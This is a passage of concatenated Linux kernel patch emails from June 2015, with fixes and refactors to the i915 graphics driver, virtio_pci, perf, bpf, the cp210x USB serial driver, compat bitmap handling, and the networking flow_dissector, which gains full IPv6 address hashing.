64.368704] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 This patch reloads this value into the register during ring init. Signed-off-by: Arun Siluvery Reviewed-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_lrc.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/gpu/drm/i915/intel_lrc.c b/drivers/gpu/drm/i915/intel_lrc.c index 09df74b8e917..424e62197787 100644 --- a/drivers/gpu/drm/i915/intel_lrc.c +++ b/drivers/gpu/drm/i915/intel_lrc.c @@ -1134,6 +1134,12 @@ static int gen8_init_common_ring(struct intel_engine_cs *ring) I915_WRITE_IMR(ring, ~(ring->irq_enable_mask | ring->irq_keep_mask)); I915_WRITE(RING_HWSTAM(ring->mmio_base), 0xffffffff); + if (ring->status_page.obj) { + I915_WRITE(RING_HWS_PGA(ring->mmio_base), + (u32)ring->status_page.gfx_addr); + POSTING_READ(RING_HWS_PGA(ring->mmio_base)); + } + I915_WRITE(RING_MODE_GEN7(ring), _MASKED_BIT_DISABLE(GFX_REPLAY_MODE) | _MASKED_BIT_ENABLE(GFX_RUN_LIST_ENABLE)); From 77b64555f8ddf28d99b4cc19ef4a56b6df39cd81 Mon Sep 17 00:00:00 2001 From: Ander Conselvan de Oliveira Date: Tue, 2 Jun 2015 14:17:47 +0300 Subject: [PATCH 688/872] drm/i915: Include G4X/VLV/CHV in self refresh status MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Add all missing platforms handled by intel_set_memory_cxsr() to the i915_sr_status debugfs entry. v2: Add G4X too. (Ville) Clarify the change also affects CHV. (Ander) References: https://bugs.freedesktop.org/show_bug.cgi?id=89792 Signed-off-by: Ander Conselvan de Oliveira Reviewed-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_debugfs.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/gpu/drm/i915/i915_debugfs.c b/drivers/gpu/drm/i915/i915_debugfs.c index 007c7d7d8295..dc55c51964ab 100644 --- a/drivers/gpu/drm/i915/i915_debugfs.c +++ b/drivers/gpu/drm/i915/i915_debugfs.c @@ -1667,12 +1667,15 @@ static int i915_sr_status(struct seq_file *m, void *unused) if (HAS_PCH_SPLIT(dev)) sr_enabled = I915_READ(WM1_LP_ILK) & WM1_LP_SR_EN; - else if (IS_CRESTLINE(dev) || IS_I945G(dev) || IS_I945GM(dev)) + else if (IS_CRESTLINE(dev) || IS_G4X(dev) || + IS_I945G(dev) || IS_I945GM(dev)) sr_enabled = I915_READ(FW_BLC_SELF) & FW_BLC_SELF_EN; else if (IS_I915GM(dev)) sr_enabled = I915_READ(INSTPM) & INSTPM_SELF_EN; else if (IS_PINEVIEW(dev)) sr_enabled = I915_READ(DSPFW3) & PINEVIEW_SELF_REFRESH_EN; + else if (IS_VALLEYVIEW(dev)) + sr_enabled = I915_READ(FW_BLC_SELF_VLV) & FW_CSPWRDWNEN; intel_runtime_pm_put(dev_priv); From 4f47c99a9be7e9b90a7f3c2c4599ea6b7c2ec49d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ville=20Syrj=C3=A4l=C3=A4?= Date: Tue, 2 Jun 2015 15:37:35 +0300 Subject: [PATCH 689/872] drm/i915: Move WaBarrierPerformanceFixDisable:skl to skl code from chv code MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 65ca7514e21adbee25b8175fc909759c735d00ff Author: Damien Lespiau Date: Mon Feb 9 19:33:22 2015 +0000 drm/i915/skl: Implement WaBarrierPerformanceFixDisable got misapplied and the code landed in chv_init_workarounds() instead of the intended skl_init_workarounds(). Move it over to the right place. Cc: Damien Lespiau Signed-off-by: Ville Syrjälä Reviewed-by: Damien Lespiau Reviewed-by: Ben Widawsky Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_ringbuffer.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/gpu/drm/i915/intel_ringbuffer.c b/drivers/gpu/drm/i915/intel_ringbuffer.c index 441e2502b889..005b5e04de4d 100644 --- a/drivers/gpu/drm/i915/intel_ringbuffer.c +++ b/drivers/gpu/drm/i915/intel_ringbuffer.c @@ -901,13 +901,6 @@ static int chv_init_workarounds(struct intel_engine_cs *ring) GEN6_WIZ_HASHING_MASK, GEN6_WIZ_HASHING_16x4); - if (INTEL_REVID(dev) == SKL_REVID_C0 || - INTEL_REVID(dev) == SKL_REVID_D0) - /* WaBarrierPerformanceFixDisable:skl */ - WA_SET_BIT_MASKED(HDC_CHICKEN0, - HDC_FENCE_DEST_SLM_DISABLE | - HDC_BARRIER_PERFORMANCE_DISABLE); - return 0; } @@ -1024,6 +1017,13 @@ static int skl_init_workarounds(struct intel_engine_cs *ring) WA_SET_BIT_MASKED(HIZ_CHICKEN, BDW_HIZ_POWER_COMPILER_CLOCK_GATING_DISABLE); + if (INTEL_REVID(dev) == SKL_REVID_C0 || + INTEL_REVID(dev) == SKL_REVID_D0) + /* WaBarrierPerformanceFixDisable:skl */ + WA_SET_BIT_MASKED(HDC_CHICKEN0, + HDC_FENCE_DEST_SLM_DISABLE | + HDC_BARRIER_PERFORMANCE_DISABLE); + return skl_tune_iz_hashing(ring); } From 210d150e1f5da506875e376422ba31ead2d49621 Mon Sep 17 00:00:00 2001 From: Jiang Liu Date: Thu, 4 Jun 2015 16:41:44 +0800 Subject: [PATCH 690/872] virtio_pci: Clear stale cpumask when setting irq affinity The cpumask vp_dev->msix_affinity_masks[info->msix_vector] may contain staled information when vp_set_vq_affinity() gets called, so clear it before setting the new cpu bit mask. Cc: stable@vger.kernel.org Signed-off-by: Jiang Liu Signed-off-by: Michael S. Tsirkin --- drivers/virtio/virtio_pci_common.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/virtio/virtio_pci_common.c b/drivers/virtio/virtio_pci_common.c index e894eb278d83..eba1b7ac7294 100644 --- a/drivers/virtio/virtio_pci_common.c +++ b/drivers/virtio/virtio_pci_common.c @@ -423,6 +423,7 @@ int vp_set_vq_affinity(struct virtqueue *vq, int cpu) if (cpu == -1) irq_set_affinity_hint(irq, NULL); else { + cpumask_clear(mask); cpumask_set_cpu(cpu, mask); irq_set_affinity_hint(irq, mask); } From b44a2b53becf2485f484bd6bb6c1d963ebc339f8 Mon Sep 17 00:00:00 2001 From: Alexander Shishkin Date: Thu, 4 Jun 2015 16:31:47 +0300 Subject: [PATCH 691/872] perf/x86/intel/pt: Fix a refactoring bug Commit 066450be41 ("perf/x86/intel/pt: Clean up the control flow in pt_pmu_hw_init()") changed attribute initialization so that only the first attribute gets initialized using sysfs_attr_init(), which upsets lockdep. This patch fixes the glitch so that all allocated attributes are properly initialized thus fixing the lockdep warning reported by Tvrtko and Imre. Reported-by: Tvrtko Ursulin Reported-by: Imre Deak Signed-off-by: Alexander Shishkin Cc: Cc: Andrew Morton Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_pt.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_pt.c b/arch/x86/kernel/cpu/perf_event_intel_pt.c index 5b804f96ad66..123ff1bb2f60 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_pt.c +++ b/arch/x86/kernel/cpu/perf_event_intel_pt.c @@ -151,7 +151,7 @@ static int __init pt_pmu_hw_init(void) de_attr->attr.attr.name = pt_caps[i].name; - sysfs_attr_init(&de_attrs->attr.attr); + sysfs_attr_init(&de_attr->attr.attr); de_attr->attr.attr.mode = S_IRUGO; de_attr->attr.show = pt_cap_show; From 94db13fe5ff144ea5afcfa3a3daf38a239090acf Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 4 Jun 2015 08:33:48 -0700 Subject: [PATCH 692/872] bpf: fix build due to missing tc_verd fix build error: net/core/filter.c: In function 'bpf_clone_redirect': net/core/filter.c:1429:18: error: 'struct sk_buff' has no member named 'tc_verd' if (G_TC_AT(skb2->tc_verd) & AT_INGRESS) Fixes: 3896d655f4d4 ("bpf: introduce bpf_clone_redirect() helper") Reported-by: Or Gerlitz Reported-by: Fengguang Wu Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- net/core/filter.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/net/core/filter.c b/net/core/filter.c index 64c121c09655..09b2062eb5b8 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -46,7 +46,6 @@ #include #include #include -#include /** * sk_filter - run a packet through a socket filter @@ -1426,8 +1425,7 @@ static u64 bpf_clone_redirect(u64 r1, u64 ifindex, u64 flags, u64 r4, u64 r5) if (unlikely(!skb2)) return -ENOMEM; - if (G_TC_AT(skb2->tc_verd) & AT_INGRESS) - skb_push(skb2, skb2->mac_len); + skb_push(skb2, skb2->data - skb_mac_header(skb2)); if (BPF_IS_REDIRECT_INGRESS(flags)) return dev_forward_skb(dev, skb2); From df72d588c54dad57dabb3cc8a87475d8ed66d806 Mon Sep 17 00:00:00 2001 From: "John D. Blair" Date: Thu, 4 Jun 2015 13:18:19 -0700 Subject: [PATCH 693/872] USB: cp210x: add ID for HubZ dual ZigBee and Z-Wave dongle Added the USB serial device ID for the HubZ dual ZigBee and Z-Wave radio dongle. Signed-off-by: John D. Blair Cc: stable Signed-off-by: Johan Hovold --- drivers/usb/serial/cp210x.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c index 9031750e7404..ffd739e31bfc 100644 --- a/drivers/usb/serial/cp210x.c +++ b/drivers/usb/serial/cp210x.c @@ -128,6 +128,7 @@ static const struct usb_device_id id_table[] = { { USB_DEVICE(0x10C4, 0x8946) }, /* Ketra N1 Wireless Interface */ { USB_DEVICE(0x10C4, 0x8977) }, /* CEL MeshWorks DevKit Device */ { USB_DEVICE(0x10C4, 0x8998) }, /* KCF Technologies PRN */ + { USB_DEVICE(0x10C4, 0x8A2A) }, /* HubZ dual ZigBee and Z-Wave dongle */ { USB_DEVICE(0x10C4, 0xEA60) }, /* Silicon Labs factory default */ { USB_DEVICE(0x10C4, 0xEA61) }, /* Silicon Labs factory default */ { USB_DEVICE(0x10C4, 0xEA70) }, /* Silicon Labs factory default */ From 9b7b819ca1e508195feed5ece558dca66adeef05 Mon Sep 17 00:00:00 2001 From: Helge Deller Date: Thu, 4 Jun 2015 23:57:18 +0200 Subject: [PATCH 694/872] compat: cleanup coding in compat_get_bitmap() and compat_put_bitmap() In the functions compat_get_bitmap() and compat_put_bitmap() the variable nr_compat_longs stores how many compat_ulong_t words should be copied in a loop. The copy loop itself is this: if (nr_compat_longs-- > 0) { if (__get_user(um, umask)) return -EFAULT; } else { um = 0; } Since nr_compat_longs gets unconditionally decremented in each loop and since it's type is unsigned this could theoretically lead to out of bounds accesses to userspace if nr_compat_longs wraps around to (unsigned)(-1). Although the callers currently do not trigger out-of-bounds accesses, we should better implement the loop in a safe way to completely avoid such warp-arounds. Signed-off-by: Helge Deller Cc: Linus Torvalds Cc: Al Viro --- kernel/compat.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/kernel/compat.c b/kernel/compat.c index 24f00610c575..333d364be29d 100644 --- a/kernel/compat.c +++ b/kernel/compat.c @@ -912,7 +912,8 @@ long compat_get_bitmap(unsigned long *mask, const compat_ulong_t __user *umask, * bitmap. We must however ensure the end of the * kernel bitmap is zeroed. */ - if (nr_compat_longs-- > 0) { + if (nr_compat_longs) { + nr_compat_longs--; if (__get_user(um, umask)) return -EFAULT; } else { @@ -954,7 +955,8 @@ long compat_put_bitmap(compat_ulong_t __user *umask, unsigned long *mask, * We dont want to write past the end of the userspace * bitmap. */ - if (nr_compat_longs-- > 0) { + if (nr_compat_longs) { + nr_compat_longs--; if (__put_user(um, umask)) return -EFAULT; } From ffaa31d7945f14edb04d7b2792a1dbd3a854a2bc Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Thu, 4 Jun 2015 20:11:00 +0530 Subject: [PATCH 695/872] atm:he - Do not initialise statics to 0. According to false is always '0' and Static variables are initialised to 0 by GCC. Signed-off-by: Shailendra Verma Signed-off-by: David S. Miller --- drivers/atm/he.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/atm/he.c b/drivers/atm/he.c index 0237271e80fc..a8da3a50e374 100644 --- a/drivers/atm/he.c +++ b/drivers/atm/he.c @@ -117,7 +117,7 @@ static short nvpibits = -1; static short nvcibits = -1; static short rx_skb_reserve = 16; static bool irq_coalesce = true; -static bool sdh = 0; +static bool sdh; /* Read from EEPROM = 0000 0011b */ static unsigned int readtab[] = { From ce3b5355477ce99bffa60a6a215f2e11db4b649c Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:36 -0700 Subject: [PATCH 696/872] net: Simplify GRE case in flow_dissector Do break when we see routing flag or a non-zero version number in GRE header. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- net/core/flow_dissector.c | 44 +++++++++++++++++++-------------------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 1f2d89300b1a..7f699169dc92 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -308,30 +308,30 @@ bool __skb_flow_dissect(const struct sk_buff *skb, * Only look inside GRE if version zero and no * routing */ - if (!(hdr->flags & (GRE_VERSION|GRE_ROUTING))) { - proto = hdr->proto; + if (hdr->flags & (GRE_VERSION | GRE_ROUTING)) + break; + + proto = hdr->proto; + nhoff += 4; + if (hdr->flags & GRE_CSUM) nhoff += 4; - if (hdr->flags & GRE_CSUM) - nhoff += 4; - if (hdr->flags & GRE_KEY) - nhoff += 4; - if (hdr->flags & GRE_SEQ) - nhoff += 4; - if (proto == htons(ETH_P_TEB)) { - const struct ethhdr *eth; - struct ethhdr _eth; - - eth = __skb_header_pointer(skb, nhoff, - sizeof(_eth), - data, hlen, &_eth); - if (!eth) - return false; - proto = eth->h_proto; - nhoff += sizeof(*eth); - } - goto again; + if (hdr->flags & GRE_KEY) + nhoff += 4; + if (hdr->flags & GRE_SEQ) + nhoff += 4; + if (proto == htons(ETH_P_TEB)) { + const struct ethhdr *eth; + struct ethhdr _eth; + + eth = __skb_header_pointer(skb, nhoff, + sizeof(_eth), + data, hlen, &_eth); + if (!eth) + return false; + proto = eth->h_proto; + nhoff += sizeof(*eth); } - break; + goto again; } case IPPROTO_IPIP: proto = htons(ETH_P_IP); From 730fc4371333636a00fed32c587fc1e85c5367e2 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:37 -0700 Subject: [PATCH 697/872] mpls: Add definition for IPPROTO_MPLS Add uapi define for MPLS over IP. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/uapi/linux/in.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/include/uapi/linux/in.h b/include/uapi/linux/in.h index 589ced069e8a..641338bef651 100644 --- a/include/uapi/linux/in.h +++ b/include/uapi/linux/in.h @@ -69,6 +69,8 @@ enum { #define IPPROTO_SCTP IPPROTO_SCTP IPPROTO_UDPLITE = 136, /* UDP-Lite (RFC 3828) */ #define IPPROTO_UDPLITE IPPROTO_UDPLITE + IPPROTO_MPLS = 137, /* MPLS in IP (RFC 4023) */ +#define IPPROTO_MPLS IPPROTO_MPLS IPPROTO_RAW = 255, /* Raw IP packets */ #define IPPROTO_RAW IPPROTO_RAW IPPROTO_MAX From c468efe2c7d478bad8855f7d170cf245ee0f1b3f Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:38 -0700 Subject: [PATCH 698/872] net: Remove superfluous setting of key_basic key_basic is set twice in __skb_flow_dissect which seems unnecessary. Remove second one. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- net/core/flow_dissector.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 7f699169dc92..0763795bea8f 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -343,12 +343,6 @@ bool __skb_flow_dissect(const struct sk_buff *skb, break; } - /* It is ensured by skb_flow_dissector_init() that basic key will - * be always present. - */ - key_basic = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_BASIC, - target_container); key_basic->n_proto = proto; key_basic->ip_proto = ip_proto; key_basic->thoff = (u16) nhoff; From 42aecaa9bb2bd57eb8d61b4565cee5d3640863fb Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:39 -0700 Subject: [PATCH 699/872] net: Get skb hash over flow_keys structure This patch changes flow hashing to use jhash2 over the flow_keys structure instead just doing jhash_3words over src, dst, and ports. This method will allow us take more input into the hashing function so that we can include full IPv6 addresses, VLAN, flow labels etc. without needing to resort to xor'ing which makes for a poor hash. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/linux/skbuff.h | 2 +- include/net/flow_dissector.h | 21 ++++++++++++-- include/net/ip.h | 2 ++ include/net/ipv6.h | 2 ++ net/core/flow_dissector.c | 54 +++++++++++++++++++++++++++--------- net/sched/cls_flower.c | 2 ++ 6 files changed, 66 insertions(+), 17 deletions(-) diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h index 6b41c15efa27..cc612fc0a894 100644 --- a/include/linux/skbuff.h +++ b/include/linux/skbuff.h @@ -1943,7 +1943,7 @@ static inline void skb_probe_transport_header(struct sk_buff *skb, if (skb_transport_header_was_set(skb)) return; else if (skb_flow_dissect_flow_keys(skb, &keys)) - skb_set_transport_header(skb, keys.basic.thoff); + skb_set_transport_header(skb, keys.control.thoff); else skb_set_transport_header(skb, offset_hint); } diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index bac9c1421f58..cba6a10b214a 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -6,6 +6,15 @@ #include #include +/** + * struct flow_dissector_key_control: + * @thoff: Transport header offset + */ +struct flow_dissector_key_control { + u16 thoff; + u16 padding; +}; + /** * struct flow_dissector_key_basic: * @thoff: Transport header offset @@ -13,9 +22,9 @@ * @ip_proto: Transport header protocol (eg. TCP/UDP) */ struct flow_dissector_key_basic { - u16 thoff; __be16 n_proto; u8 ip_proto; + u8 padding; }; /** @@ -70,6 +79,7 @@ struct flow_dissector_key_eth_addrs { }; enum flow_dissector_key_id { + FLOW_DISSECTOR_KEY_CONTROL, /* struct flow_dissector_key_control */ FLOW_DISSECTOR_KEY_BASIC, /* struct flow_dissector_key_basic */ FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ @@ -109,11 +119,16 @@ static inline bool skb_flow_dissect(const struct sk_buff *skb, } struct flow_keys { - struct flow_dissector_key_addrs addrs; - struct flow_dissector_key_ports ports; + struct flow_dissector_key_control control; +#define FLOW_KEYS_HASH_START_FIELD basic struct flow_dissector_key_basic basic; + struct flow_dissector_key_ports ports; + struct flow_dissector_key_addrs addrs; }; +#define FLOW_KEYS_HASH_OFFSET \ + offsetof(struct flow_keys, FLOW_KEYS_HASH_START_FIELD) + extern struct flow_dissector flow_keys_dissector; extern struct flow_dissector flow_keys_buf_dissector; diff --git a/include/net/ip.h b/include/net/ip.h index 9b976cf99122..16cfc87fed6c 100644 --- a/include/net/ip.h +++ b/include/net/ip.h @@ -360,6 +360,8 @@ static inline void inet_set_txhash(struct sock *sk) struct inet_sock *inet = inet_sk(sk); struct flow_keys keys; + memset(&keys, 0, sizeof(keys)); + keys.addrs.src = inet->inet_saddr; keys.addrs.dst = inet->inet_daddr; keys.ports.src = inet->inet_sport; diff --git a/include/net/ipv6.h b/include/net/ipv6.h index 35d485c78080..474ca466a091 100644 --- a/include/net/ipv6.h +++ b/include/net/ipv6.h @@ -699,6 +699,8 @@ static inline void ip6_set_txhash(struct sock *sk) struct ipv6_pinfo *np = inet6_sk(sk); struct flow_keys keys; + memset(&keys, 0, sizeof(keys)); + keys.addrs.src = (__force __be32)ipv6_addr_hash(&np->saddr); keys.addrs.dst = (__force __be32)ipv6_addr_hash(&sk->sk_v6_daddr); keys.ports.src = inet->inet_sport; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 0763795bea8f..55b5f2962afa 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -57,9 +57,11 @@ void skb_flow_dissector_init(struct flow_dissector *flow_dissector, flow_dissector->offset[key->key_id] = key->offset; } - /* Ensure that the dissector always includes basic key. That way - * we are able to avoid handling lack of it in fast path. + /* Ensure that the dissector always includes control and basic key. + * That way we are able to avoid handling lack of these in fast path. */ + BUG_ON(!skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_CONTROL)); BUG_ON(!skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_BASIC)); } @@ -120,6 +122,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, void *target_container, void *data, __be16 proto, int nhoff, int hlen) { + struct flow_dissector_key_control *key_control; struct flow_dissector_key_basic *key_basic; struct flow_dissector_key_addrs *key_addrs; struct flow_dissector_key_ports *key_ports; @@ -132,6 +135,13 @@ bool __skb_flow_dissect(const struct sk_buff *skb, hlen = skb_headlen(skb); } + /* It is ensured by skb_flow_dissector_init() that control key will + * be always present. + */ + key_control = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_CONTROL, + target_container); + /* It is ensured by skb_flow_dissector_init() that basic key will * be always present. */ @@ -219,7 +229,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_basic->n_proto = proto; key_basic->ip_proto = ip_proto; - key_basic->thoff = (u16)nhoff; + key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_PORTS)) { @@ -275,7 +285,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, if (!hdr) return false; key_basic->n_proto = proto; - key_basic->thoff = (u16)nhoff; + key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS)) { @@ -288,7 +298,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, return true; } case htons(ETH_P_FCOE): - key_basic->thoff = (u16)(nhoff + FCOE_HEADER_LEN); + key_control->thoff = (u16)(nhoff + FCOE_HEADER_LEN); /* fall through */ default: return false; @@ -345,7 +355,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_basic->n_proto = proto; key_basic->ip_proto = ip_proto; - key_basic->thoff = (u16) nhoff; + key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_PORTS)) { @@ -366,9 +376,21 @@ static __always_inline void __flow_hash_secret_init(void) net_get_random_once(&hashrnd, sizeof(hashrnd)); } -static __always_inline u32 __flow_hash_3words(u32 a, u32 b, u32 c, u32 keyval) +static __always_inline u32 __flow_hash_words(u32 *words, u32 length, u32 keyval) +{ + return jhash2(words, length, keyval); +} + +static inline void *flow_keys_hash_start(struct flow_keys *flow) { - return jhash_3words(a, b, c, keyval); + BUILD_BUG_ON(FLOW_KEYS_HASH_OFFSET % sizeof(u32)); + return (void *)flow + FLOW_KEYS_HASH_OFFSET; +} + +static inline size_t flow_keys_hash_length(struct flow_keys *flow) +{ + BUILD_BUG_ON((sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) % sizeof(u32)); + return (sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) / sizeof(u32); } static inline u32 __flow_hash_from_keys(struct flow_keys *keys, u32 keyval) @@ -383,10 +405,8 @@ static inline u32 __flow_hash_from_keys(struct flow_keys *keys, u32 keyval) swap(keys->ports.src, keys->ports.dst); } - hash = __flow_hash_3words((__force u32)keys->addrs.dst, - (__force u32)keys->addrs.src, - (__force u32)keys->ports.ports, - keyval); + hash = __flow_hash_words((u32 *)flow_keys_hash_start(keys), + flow_keys_hash_length(keys), keyval); if (!hash) hash = 1; @@ -473,7 +493,7 @@ EXPORT_SYMBOL(skb_get_hash_perturb); u32 __skb_get_poff(const struct sk_buff *skb, void *data, const struct flow_keys *keys, int hlen) { - u32 poff = keys->basic.thoff; + u32 poff = keys->control.thoff; switch (keys->basic.ip_proto) { case IPPROTO_TCP: { @@ -536,6 +556,10 @@ u32 skb_get_poff(const struct sk_buff *skb) } static const struct flow_dissector_key flow_keys_dissector_keys[] = { + { + .key_id = FLOW_DISSECTOR_KEY_CONTROL, + .offset = offsetof(struct flow_keys, control), + }, { .key_id = FLOW_DISSECTOR_KEY_BASIC, .offset = offsetof(struct flow_keys, basic), @@ -555,6 +579,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { + { + .key_id = FLOW_DISSECTOR_KEY_CONTROL, + .offset = offsetof(struct flow_keys, control), + }, { .key_id = FLOW_DISSECTOR_KEY_BASIC, .offset = offsetof(struct flow_keys, basic), diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c index 8c8f34ef6980..5a7d66c59684 100644 --- a/net/sched/cls_flower.c +++ b/net/sched/cls_flower.c @@ -25,6 +25,7 @@ struct fl_flow_key { int indev_ifindex; + struct flow_dissector_key_control control; struct flow_dissector_key_basic basic; struct flow_dissector_key_eth_addrs eth; union { @@ -347,6 +348,7 @@ static void fl_init_dissector(struct cls_fl_head *head, struct flow_dissector_key keys[FLOW_DISSECTOR_KEY_MAX]; size_t cnt = 0; + FL_KEY_SET(keys, cnt, FLOW_DISSECTOR_KEY_CONTROL, control); FL_KEY_SET(keys, cnt, FLOW_DISSECTOR_KEY_BASIC, basic); FL_KEY_SET_IF_IN_RANGE(mask, keys, cnt, FLOW_DISSECTOR_KEY_ETH_ADDRS, eth); From c3f8324188fa80178f20c8209b492ca6191177e8 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:40 -0700 Subject: [PATCH 700/872] net: Add full IPv6 addresses to flow_keys This patch adds full IPv6 addresses into flow_keys and uses them as input to the flow hash function. The implementation supports either IPv4 or IPv6 addresses in a union, and selector is used to determine how may words to input to jhash2. We also add flow_get_u32_dst and flow_get_u32_src functions which are used to get a u32 representation of the source and destination addresses. For IPv6, ipv6_addr_hash is called. These functions retain getting the legacy values of src and dst in flow_keys. With this patch, Ethertype and IP protocol are now included in the flow hash input. Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- drivers/net/bonding/bond_main.c | 9 +- drivers/net/ethernet/cisco/enic/enic_clsf.c | 8 +- .../net/ethernet/cisco/enic/enic_ethtool.c | 4 +- include/net/flow_dissector.h | 52 +++++--- include/net/ip.h | 19 ++- include/net/ipv6.h | 21 +++- net/core/flow_dissector.c | 116 +++++++++++++++--- net/ethernet/eth.c | 2 +- net/sched/cls_flow.c | 14 ++- net/sched/cls_flower.c | 11 +- 10 files changed, 193 insertions(+), 63 deletions(-) diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c index 2268438f3f63..19eb990d398c 100644 --- a/drivers/net/bonding/bond_main.c +++ b/drivers/net/bonding/bond_main.c @@ -3059,8 +3059,7 @@ static bool bond_flow_dissect(struct bonding *bond, struct sk_buff *skb, if (unlikely(!pskb_may_pull(skb, noff + sizeof(*iph)))) return false; iph = ip_hdr(skb); - fk->addrs.src = iph->saddr; - fk->addrs.dst = iph->daddr; + iph_to_flow_copy_v4addrs(fk, iph); noff += iph->ihl << 2; if (!ip_is_fragment(iph)) proto = iph->protocol; @@ -3068,8 +3067,7 @@ static bool bond_flow_dissect(struct bonding *bond, struct sk_buff *skb, if (unlikely(!pskb_may_pull(skb, noff + sizeof(*iph6)))) return false; iph6 = ipv6_hdr(skb); - fk->addrs.src = (__force __be32)ipv6_addr_hash(&iph6->saddr); - fk->addrs.dst = (__force __be32)ipv6_addr_hash(&iph6->daddr); + iph_to_flow_copy_v6addrs(fk, iph6); noff += sizeof(*iph6); proto = iph6->nexthdr; } else { @@ -3103,7 +3101,8 @@ u32 bond_xmit_hash(struct bonding *bond, struct sk_buff *skb) hash = bond_eth_hash(skb); else hash = (__force u32)flow.ports.ports; - hash ^= (__force u32)flow.addrs.dst ^ (__force u32)flow.addrs.src; + hash ^= (__force u32)flow_get_u32_dst(&flow) ^ + (__force u32)flow_get_u32_src(&flow); hash ^= (hash >> 16); hash ^= (hash >> 8); diff --git a/drivers/net/ethernet/cisco/enic/enic_clsf.c b/drivers/net/ethernet/cisco/enic/enic_clsf.c index a31b57adcb37..d106186f4f4a 100644 --- a/drivers/net/ethernet/cisco/enic/enic_clsf.c +++ b/drivers/net/ethernet/cisco/enic/enic_clsf.c @@ -33,8 +33,8 @@ int enic_addfltr_5t(struct enic *enic, struct flow_keys *keys, u16 rq) return -EPROTONOSUPPORT; }; data.type = FILTER_IPV4_5TUPLE; - data.u.ipv4.src_addr = ntohl(keys->addrs.src); - data.u.ipv4.dst_addr = ntohl(keys->addrs.dst); + data.u.ipv4.src_addr = ntohl(keys->addrs.v4addrs.src); + data.u.ipv4.dst_addr = ntohl(keys->addrs.v4addrs.dst); data.u.ipv4.src_port = ntohs(keys->ports.src); data.u.ipv4.dst_port = ntohs(keys->ports.dst); 